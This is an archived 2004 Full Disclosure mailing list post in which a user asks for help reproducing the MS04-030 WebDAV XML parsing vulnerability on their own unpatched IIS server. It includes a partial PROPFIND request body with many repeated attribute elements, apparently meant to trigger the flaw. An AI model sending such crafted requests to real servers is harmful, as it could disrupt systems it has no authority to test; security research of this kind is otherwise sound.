Full Disclosure mailing list archives
MS04-030 WebDAV XML Parsing - Need Details
From: nirvana <karmic_nirvana () yahoo com>
Date: Wed, 13 Oct 2004 10:10:18 -0700 (PDT)
Hi List,
I've been trying to reproduce this vulnerability
(MS04-030) on my unpatched IIS. I am sending a request
with a element which has multiple/many attributes.
With my limited knowlegde of WebDAV, I think the
attributes per-element can be sent in two ways
1.in one line, in the element tag only
2.in multiple per attribute tags.
The request I am sending is something like this (XML
Data only from a PROPFIND Request, with multiple
tags)...
<?xml version="1.0" encoding="utf-8" ?>
<D:propfind xmlns:D="DAV:">
<D:prop xmlns:ns="DAV:"><ns:displayname/>
<ns:displayname>
<attrib1>a</attrib1>
<attrib1>a</attrib1>
.
.
.
.
<attrib1>a</attrib1>
</ns:displayname>
</D:prop>
</D:propfind>
Plz feel free to rant me if I doin wrong :).
Thanks.
__________________________________
Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard.
http://promotions.yahoo.com/new_mail
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Some presentations from IT-UNDERGROUND conference Dave Aitel (Oct 13)
- MS04-030 WebDAV XML Parsing - Need Details nirvana (Oct 13)
- Re: MS04-030 WebDAV XML Parsing - Need Details nirvana (Oct 13)
- MS04-030 WebDAV XML Parsing - Need Details nirvana (Oct 13)